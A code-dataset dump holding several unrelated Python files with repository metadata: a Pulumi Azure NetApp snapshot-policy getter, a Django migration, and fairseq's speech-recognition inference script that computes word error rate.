from sklearn.model_selection import RandomizedSearchCV
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_selection import SelectFromModel
from sklearn.feature_selection import SequentialFeatureSelector
from sklearn.metrics import classification_report, accuracy_score
from sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay
from sklearn_genetic import GAFeatureSelectionCV
os.getcwd()
"""
usage joblib
# save the model:
joblib.dump(model , "model.pkl")
# load the model:
model = joblib.load("model.pkl")
""" | 29.393939 | 68 | 0.846392 |
ef774bf625c8c02bb3b54560c0ff555c4ab3cee6 | 7,134 | py | Python | sdk/python/pulumi_azure_native/netapp/v20200501/get_snapshot_policy.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/netapp/v20200501/get_snapshot_policy.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/netapp/v20200501/get_snapshot_policy.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetSnapshotPolicyResult',
'AwaitableGetSnapshotPolicyResult',
'get_snapshot_policy',
]
@pulumi.output_type
class GetSnapshotPolicyResult:
"""
Snapshot policy information
"""
def __init__(__self__, daily_schedule=None, enabled=None, hourly_schedule=None, id=None, location=None, monthly_schedule=None, name=None, provisioning_state=None, tags=None, type=None, weekly_schedule=None):
if daily_schedule and not isinstance(daily_schedule, dict):
raise TypeError("Expected argument 'daily_schedule' to be a dict")
pulumi.set(__self__, "daily_schedule", daily_schedule)
if enabled and not isinstance(enabled, bool):
raise TypeError("Expected argument 'enabled' to be a bool")
pulumi.set(__self__, "enabled", enabled)
if hourly_schedule and not isinstance(hourly_schedule, dict):
raise TypeError("Expected argument 'hourly_schedule' to be a dict")
pulumi.set(__self__, "hourly_schedule", hourly_schedule)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if monthly_schedule and not isinstance(monthly_schedule, dict):
raise TypeError("Expected argument 'monthly_schedule' to be a dict")
pulumi.set(__self__, "monthly_schedule", monthly_schedule)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if weekly_schedule and not isinstance(weekly_schedule, dict):
raise TypeError("Expected argument 'weekly_schedule' to be a dict")
pulumi.set(__self__, "weekly_schedule", weekly_schedule)
@property
@pulumi.getter(name="dailySchedule")
def daily_schedule(self) -> Optional['outputs.DailyScheduleResponse']:
"""
Schedule for daily snapshots
"""
return pulumi.get(self, "daily_schedule")
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
The property to decide policy is enabled or not
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="hourlySchedule")
def hourly_schedule(self) -> Optional['outputs.HourlyScheduleResponse']:
"""
Schedule for hourly snapshots
"""
return pulumi.get(self, "hourly_schedule")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="monthlySchedule")
def monthly_schedule(self) -> Optional['outputs.MonthlyScheduleResponse']:
"""
Schedule for monthly snapshots
"""
return pulumi.get(self, "monthly_schedule")
@property
@pulumi.getter
def name(self) -> str:
"""
Snapshot policy name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
Azure lifecycle management
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="weeklySchedule")
def weekly_schedule(self) -> Optional['outputs.WeeklyScheduleResponse']:
"""
Schedule for weekly snapshots
"""
return pulumi.get(self, "weekly_schedule")
class AwaitableGetSnapshotPolicyResult(GetSnapshotPolicyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSnapshotPolicyResult(
daily_schedule=self.daily_schedule,
enabled=self.enabled,
hourly_schedule=self.hourly_schedule,
id=self.id,
location=self.location,
monthly_schedule=self.monthly_schedule,
name=self.name,
provisioning_state=self.provisioning_state,
tags=self.tags,
type=self.type,
weekly_schedule=self.weekly_schedule)
def get_snapshot_policy(account_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
snapshot_policy_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSnapshotPolicyResult:
"""
Snapshot policy information
:param str account_name: The name of the NetApp account
:param str resource_group_name: The name of the resource group.
:param str snapshot_policy_name: The name of the snapshot policy target
"""
__args__ = dict()
__args__['accountName'] = account_name
__args__['resourceGroupName'] = resource_group_name
__args__['snapshotPolicyName'] = snapshot_policy_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:netapp/v20200501:getSnapshotPolicy', __args__, opts=opts, typ=GetSnapshotPolicyResult).value
return AwaitableGetSnapshotPolicyResult(
daily_schedule=__ret__.daily_schedule,
enabled=__ret__.enabled,
hourly_schedule=__ret__.hourly_schedule,
id=__ret__.id,
location=__ret__.location,
monthly_schedule=__ret__.monthly_schedule,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
tags=__ret__.tags,
type=__ret__.type,
weekly_schedule=__ret__.weekly_schedule)
| 35.67 | 211 | 0.650407 |
59f10c249f2514c8906f77b34ed888a865f51c3f | 669 | py | Python | api/migrations/0124_eventparticipation_account_owner_status.py | eiling/SchoolIdolAPI | a05980fdb33b143dbe2febfc1ad6cf723f025c8d | [
"Apache-2.0"
] | 65 | 2017-12-29T12:28:11.000Z | 2022-03-15T06:42:26.000Z | api/migrations/0124_eventparticipation_account_owner_status.py | eiling/SchoolIdolAPI | a05980fdb33b143dbe2febfc1ad6cf723f025c8d | [
"Apache-2.0"
] | 31 | 2017-12-18T02:03:09.000Z | 2022-01-13T00:43:35.000Z | api/migrations/0124_eventparticipation_account_owner_status.py | eiling/SchoolIdolAPI | a05980fdb33b143dbe2febfc1ad6cf723f025c8d | [
"Apache-2.0"
] | 7 | 2018-08-27T15:11:01.000Z | 2021-08-16T05:15:13.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0123_auto_20160401_0019'),
]
operations = [
migrations.AddField(
model_name='eventparticipation',
name='account_owner_status',
field=models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')]),
preserve_default=True,
),
]
| 31.857143 | 262 | 0.632287 |
355ccbe141f99ee9739154ad86b41dafaf9eb6b4 | 16,969 | py | Python | edgelm/examples/speech_recognition/new/infer.py | guotao0628/DeepNet | 1ae74d8b44d715bf67c7d64a8efafff4b7c7937a | [
"MIT"
] | 1 | 2021-11-07T00:30:05.000Z | 2021-11-07T00:30:05.000Z | edgelm/examples/speech_recognition/new/infer.py | guotao0628/DeepNet | 1ae74d8b44d715bf67c7d64a8efafff4b7c7937a | [
"MIT"
] | null | null | null | edgelm/examples/speech_recognition/new/infer.py | guotao0628/DeepNet | 1ae74d8b44d715bf67c7d64a8efafff4b7c7937a | [
"MIT"
] | null | null | null | #!/usr/bin/env python -u
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import ast
import hashlib
import logging
import os
import shutil
import sys
from dataclasses import dataclass, field, is_dataclass
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union
import editdistance
import torch
import torch.distributed as dist
from examples.speech_recognition.new.decoders.decoder_config import (
DecoderConfig,
FlashlightDecoderConfig,
)
from examples.speech_recognition.new.decoders.decoder import Decoder
from fairseq import checkpoint_utils, distributed_utils, progress_bar, tasks, utils
from fairseq.data.data_utils import post_process
from fairseq.dataclass.configs import (
CheckpointConfig,
CommonConfig,
CommonEvalConfig,
DatasetConfig,
DistributedTrainingConfig,
FairseqDataclass,
)
from fairseq.logging.meters import StopwatchMeter, TimeMeter
from fairseq.logging.progress_bar import BaseProgressBar
from fairseq.models.fairseq_model import FairseqModel
from omegaconf import OmegaConf
import hydra
from hydra.core.config_store import ConfigStore
logging.root.setLevel(logging.INFO)
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
config_path = Path(__file__).resolve().parent / "conf"
@dataclass
class DecodingConfig(DecoderConfig, FlashlightDecoderConfig):
unique_wer_file: bool = field(
default=False,
metadata={"help": "If set, use a unique file for storing WER"},
)
results_path: Optional[str] = field(
default=None,
metadata={
"help": "If set, write hypothesis and reference sentences into this directory"
},
)
@dataclass
class InferConfig(FairseqDataclass):
task: Any = None
decoding: DecodingConfig = DecodingConfig()
common: CommonConfig = CommonConfig()
common_eval: CommonEvalConfig = CommonEvalConfig()
checkpoint: CheckpointConfig = CheckpointConfig()
distributed_training: DistributedTrainingConfig = DistributedTrainingConfig()
dataset: DatasetConfig = DatasetConfig()
is_ax: bool = field(
default=False,
metadata={
"help": "if true, assumes we are using ax for tuning and returns a tuple for ax to consume"
},
)
def reset_logging():
root = logging.getLogger()
for handler in root.handlers:
root.removeHandler(handler)
root.setLevel(os.environ.get("LOGLEVEL", "INFO").upper())
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter(
fmt="%(asctime)s | %(levelname)s | %(name)s | %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
)
root.addHandler(handler)
class InferenceProcessor:
cfg: InferConfig
def __init__(self, cfg: InferConfig) -> None:
self.cfg = cfg
self.task = tasks.setup_task(cfg.task)
models, saved_cfg = self.load_model_ensemble()
self.models = models
self.saved_cfg = saved_cfg
self.tgt_dict = self.task.target_dictionary
self.task.load_dataset(
self.cfg.dataset.gen_subset,
task_cfg=saved_cfg.task,
)
self.generator = Decoder(cfg.decoding, self.tgt_dict)
self.gen_timer = StopwatchMeter()
self.wps_meter = TimeMeter()
self.num_sentences = 0
self.total_errors = 0
self.total_length = 0
self.hypo_words_file = None
self.hypo_units_file = None
self.ref_words_file = None
self.ref_units_file = None
self.progress_bar = self.build_progress_bar()
def __enter__(self) -> "InferenceProcessor":
if self.cfg.decoding.results_path is not None:
self.hypo_words_file = self.get_res_file("hypo.word")
self.hypo_units_file = self.get_res_file("hypo.units")
self.ref_words_file = self.get_res_file("ref.word")
self.ref_units_file = self.get_res_file("ref.units")
return self
def __exit__(self, *exc) -> bool:
if self.cfg.decoding.results_path is not None:
self.hypo_words_file.close()
self.hypo_units_file.close()
self.ref_words_file.close()
self.ref_units_file.close()
return False
def __iter__(self) -> Any:
for sample in self.progress_bar:
if not self.cfg.common.cpu:
sample = utils.move_to_cuda(sample)
# Happens on the last batch.
if "net_input" not in sample:
continue
yield sample
def log(self, *args, **kwargs):
self.progress_bar.log(*args, **kwargs)
def print(self, *args, **kwargs):
self.progress_bar.print(*args, **kwargs)
def get_res_file(self, fname: str) -> None:
fname = os.path.join(self.cfg.decoding.results_path, fname)
if self.data_parallel_world_size > 1:
fname = f"{fname}.{self.data_parallel_rank}"
return open(fname, "w", buffering=1)
def merge_shards(self) -> None:
"""Merges all shard files into shard 0, then removes shard suffix."""
shard_id = self.data_parallel_rank
num_shards = self.data_parallel_world_size
if self.data_parallel_world_size > 1:
def merge_shards_with_root(fname: str) -> None:
fname = os.path.join(self.cfg.decoding.results_path, fname)
logger.info("Merging %s on shard %d", fname, shard_id)
base_fpath = Path(f"{fname}.0")
with open(base_fpath, "a") as out_file:
for s in range(1, num_shards):
shard_fpath = Path(f"{fname}.{s}")
with open(shard_fpath, "r") as in_file:
for line in in_file:
out_file.write(line)
shard_fpath.unlink()
shutil.move(f"{fname}.0", fname)
dist.barrier() # ensure all shards finished writing
if shard_id == (0 % num_shards):
merge_shards_with_root("hypo.word")
if shard_id == (1 % num_shards):
merge_shards_with_root("hypo.units")
if shard_id == (2 % num_shards):
merge_shards_with_root("ref.word")
if shard_id == (3 % num_shards):
merge_shards_with_root("ref.units")
dist.barrier()
def optimize_model(self, model: FairseqModel) -> None:
model.make_generation_fast_()
if self.cfg.common.fp16:
model.half()
if not self.cfg.common.cpu:
model.cuda()
def load_model_ensemble(self) -> Tuple[List[FairseqModel], FairseqDataclass]:
arg_overrides = ast.literal_eval(self.cfg.common_eval.model_overrides)
models, saved_cfg = checkpoint_utils.load_model_ensemble(
utils.split_paths(self.cfg.common_eval.path, separator="\\"),
arg_overrides=arg_overrides,
task=self.task,
suffix=self.cfg.checkpoint.checkpoint_suffix,
strict=(self.cfg.checkpoint.checkpoint_shard_count == 1),
num_shards=self.cfg.checkpoint.checkpoint_shard_count,
)
for model in models:
self.optimize_model(model)
return models, saved_cfg
def get_dataset_itr(self, disable_iterator_cache: bool = False) -> None:
return self.task.get_batch_iterator(
dataset=self.task.dataset(self.cfg.dataset.gen_subset),
max_tokens=self.cfg.dataset.max_tokens,
max_sentences=self.cfg.dataset.batch_size,
max_positions=(sys.maxsize, sys.maxsize),
ignore_invalid_inputs=self.cfg.dataset.skip_invalid_size_inputs_valid_test,
required_batch_size_multiple=self.cfg.dataset.required_batch_size_multiple,
seed=self.cfg.common.seed,
num_shards=self.data_parallel_world_size,
shard_id=self.data_parallel_rank,
num_workers=self.cfg.dataset.num_workers,
data_buffer_size=self.cfg.dataset.data_buffer_size,
disable_iterator_cache=disable_iterator_cache,
).next_epoch_itr(shuffle=False)
def build_progress_bar(
self,
epoch: Optional[int] = None,
prefix: Optional[str] = None,
default_log_format: str = "tqdm",
) -> BaseProgressBar:
return progress_bar.progress_bar(
iterator=self.get_dataset_itr(),
log_format=self.cfg.common.log_format,
log_interval=self.cfg.common.log_interval,
epoch=epoch,
prefix=prefix,
tensorboard_logdir=self.cfg.common.tensorboard_logdir,
default_log_format=default_log_format,
)
@property
def data_parallel_world_size(self):
if self.cfg.distributed_training.distributed_world_size == 1:
return 1
return distributed_utils.get_data_parallel_world_size()
@property
def data_parallel_rank(self):
if self.cfg.distributed_training.distributed_world_size == 1:
return 0
return distributed_utils.get_data_parallel_rank()
def process_sentence(
self,
sample: Dict[str, Any],
hypo: Dict[str, Any],
sid: int,
batch_id: int,
) -> Tuple[int, int]:
speaker = None # Speaker can't be parsed from dataset.
if "target_label" in sample:
toks = sample["target_label"]
else:
toks = sample["target"]
toks = toks[batch_id, :]
# Processes hypothesis.
hyp_pieces = self.tgt_dict.string(hypo["tokens"].int().cpu())
if "words" in hypo:
hyp_words = " ".join(hypo["words"])
else:
hyp_words = post_process(hyp_pieces, self.cfg.common_eval.post_process)
# Processes target.
target_tokens = utils.strip_pad(toks, self.tgt_dict.pad())
tgt_pieces = self.tgt_dict.string(target_tokens.int().cpu())
tgt_words = post_process(tgt_pieces, self.cfg.common_eval.post_process)
if self.cfg.decoding.results_path is not None:
print(f"{hyp_pieces} ({speaker}-{sid})", file=self.hypo_units_file)
print(f"{hyp_words} ({speaker}-{sid})", file=self.hypo_words_file)
print(f"{tgt_pieces} ({speaker}-{sid})", file=self.ref_units_file)
print(f"{tgt_words} ({speaker}-{sid})", file=self.ref_words_file)
if not self.cfg.common_eval.quiet:
logger.info(f"HYPO: {hyp_words}")
logger.info(f"REF: {tgt_words}")
logger.info("---------------------")
hyp_words, tgt_words = hyp_words.split(), tgt_words.split()
return editdistance.eval(hyp_words, tgt_words), len(tgt_words)
def process_sample(self, sample: Dict[str, Any]) -> None:
self.gen_timer.start()
hypos = self.task.inference_step(
generator=self.generator,
models=self.models,
sample=sample,
)
num_generated_tokens = sum(len(h[0]["tokens"]) for h in hypos)
self.gen_timer.stop(num_generated_tokens)
self.wps_meter.update(num_generated_tokens)
for batch_id, sample_id in enumerate(sample["id"].tolist()):
errs, length = self.process_sentence(
sample=sample,
sid=sample_id,
batch_id=batch_id,
hypo=hypos[batch_id][0],
)
self.total_errors += errs
self.total_length += length
self.log({"wps": round(self.wps_meter.avg)})
if "nsentences" in sample:
self.num_sentences += sample["nsentences"]
else:
self.num_sentences += sample["id"].numel()
def log_generation_time(self) -> None:
logger.info(
"Processed %d sentences (%d tokens) in %.1fs %.2f "
"sentences per second, %.2f tokens per second)",
self.num_sentences,
self.gen_timer.n,
self.gen_timer.sum,
self.num_sentences / self.gen_timer.sum,
1.0 / self.gen_timer.avg,
)
def parse_wer(wer_file: Path) -> float:
with open(wer_file, "r") as f:
return float(f.readline().strip().split(" ")[1])
def get_wer_file(cfg: InferConfig) -> Path:
"""Hashes the decoding parameters to a unique file ID."""
base_path = "wer"
if cfg.decoding.results_path is not None:
base_path = os.path.join(cfg.decoding.results_path, base_path)
if cfg.decoding.unique_wer_file:
yaml_str = OmegaConf.to_yaml(cfg.decoding)
fid = int(hashlib.md5(yaml_str.encode("utf-8")).hexdigest(), 16)
return Path(f"{base_path}.{fid % 1000000}")
else:
return Path(base_path)
def main(cfg: InferConfig) -> float:
"""Entry point for main processing logic.
Args:
cfg: The inferance configuration to use.
wer: Optional shared memory pointer for returning the WER. If not None,
the final WER value will be written here instead of being returned.
Returns:
The final WER if `wer` is None, otherwise None.
"""
yaml_str, wer_file = OmegaConf.to_yaml(cfg.decoding), get_wer_file(cfg)
# Validates the provided configuration.
if cfg.dataset.max_tokens is None and cfg.dataset.batch_size is None:
cfg.dataset.max_tokens = 4000000
if not cfg.common.cpu and not torch.cuda.is_available():
raise ValueError("CUDA not found; set `cpu=True` to run without CUDA")
with InferenceProcessor(cfg) as processor:
for sample in processor:
processor.process_sample(sample)
processor.log_generation_time()
if cfg.decoding.results_path is not None:
processor.merge_shards()
errs_t, leng_t = processor.total_errors, processor.total_length
if cfg.common.cpu:
logger.warning("Merging WER requires CUDA.")
elif processor.data_parallel_world_size > 1:
stats = torch.LongTensor([errs_t, leng_t]).cuda()
dist.all_reduce(stats, op=dist.ReduceOp.SUM)
errs_t, leng_t = stats[0].item(), stats[1].item()
wer = errs_t * 100.0 / leng_t
if distributed_utils.is_master(cfg.distributed_training):
with open(wer_file, "w") as f:
f.write(
(
f"WER: {wer}\n"
f"err / num_ref_words = {errs_t} / {leng_t}\n\n"
f"{yaml_str}"
)
)
return wer
@hydra.main(config_path=config_path, config_name="infer")
def hydra_main(cfg: InferConfig) -> Union[float, Tuple[float, Optional[float]]]:
container = OmegaConf.to_container(cfg, resolve=True, enum_to_str=True)
cfg = OmegaConf.create(container)
OmegaConf.set_struct(cfg, True)
if cfg.common.reset_logging:
reset_logging()
# logger.info("Config:\n%s", OmegaConf.to_yaml(cfg))
wer = float("inf")
try:
if cfg.common.profile:
with torch.cuda.profiler.profile():
with torch.autograd.profiler.emit_nvtx():
distributed_utils.call_main(cfg, main)
else:
distributed_utils.call_main(cfg, main)
wer = parse_wer(get_wer_file(cfg))
except BaseException as e: # pylint: disable=broad-except
if not cfg.common.suppress_crashes:
raise
else:
logger.error("Crashed! %s", str(e))
logger.info("Word error rate: %.4f", wer)
if cfg.is_ax:
return wer, None
return wer
def cli_main() -> None:
try:
from hydra._internal.utils import (
get_args,
) # pylint: disable=import-outside-toplevel
cfg_name = get_args().config_name or "infer"
except ImportError:
logger.warning("Failed to get config name from hydra args")
cfg_name = "infer"
cs = ConfigStore.instance()
cs.store(name=cfg_name, node=InferConfig)
for k in InferConfig.__dataclass_fields__:
if is_dataclass(InferConfig.__dataclass_fields__[k].type):
v = InferConfig.__dataclass_fields__[k].default
cs.store(name=k, node=v)
hydra_main() # pylint: disable=no-value-for-parameter
if __name__ == "__main__":
cli_main()
| 35.951271 | 104 | 0.611645 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.